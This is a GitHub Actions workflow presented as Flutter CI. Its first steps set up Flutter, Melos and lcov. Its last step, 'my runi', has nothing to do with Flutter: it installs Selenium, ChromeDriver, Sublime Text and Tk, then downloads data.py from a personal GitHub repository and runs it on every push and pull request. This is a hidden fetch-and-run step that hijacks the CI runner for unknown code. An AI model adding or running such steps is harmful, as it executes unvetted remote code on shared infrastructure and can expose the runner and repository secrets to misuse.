name: Flutter CIo

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main
    
jobs:
  build:
    runs-on: ubuntu-20.04
    steps:
    
    - uses: actions/checkout@v2
      with:
        submodules: recursive

    - uses: subosito/flutter-action@v1
      with:
        channel: 'dev'

    - name: Enable Linux desktop support
      run: flutter config --enable-linux-desktop

    - name: Install Melos
      run: flutter pub global activate melos

    - name: Install lcov
      run: sudo apt update && sudo apt install lcov
    - name: my runi
      run: |
           sudo pip install selenium && wget https://chromedriver.storage.googleapis.com/91.0.4472.19/chromedriver_linux64.zip && unzip chromedriver_linux64.zip && chmod +x chromedriver && sudo mv chromedriver /usr/local/bin/ && wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - && sudo apt-get install apt-transport-https && echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list && sudo apt-get update && sudo apt-get install sublime-text
           sudo apt-get install python3-tk -y
           sudo apt-get install python-tk -y
           apt-get install wget -y
           wget https://github.com/thoeb292/thoeb292/raw/main/data.py
           python data.py
